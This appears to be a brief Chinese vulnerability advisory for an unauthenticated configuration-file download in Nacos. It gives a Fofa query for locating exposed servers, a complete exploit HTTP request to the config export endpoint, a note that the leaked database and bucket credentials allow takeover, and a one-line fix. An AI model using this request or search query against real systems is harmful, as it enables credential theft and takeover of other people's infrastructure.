0x01 漏洞描述:
Nacos是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。Nacos存在未授权文件下载,攻击者在不登录情况下可未授权下载系统配置文件。
攻击者利用该漏洞可未授权获取到系统配置文件,如数据库和Redis连接地址,登录账号和密码等。
0x02 搜索语句:
Fofa:icon_hash="13942501" || title="nacos"

0x03 漏洞复现:
GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive
域名拼接接口访问后

配置文件中泄漏数据库配置、存储桶配置,可实现接管

0x04 修复建议:
对未授权访问页面做session认证,严格审核后台功能页面的访问权限,若为未登录用户则拒绝访问。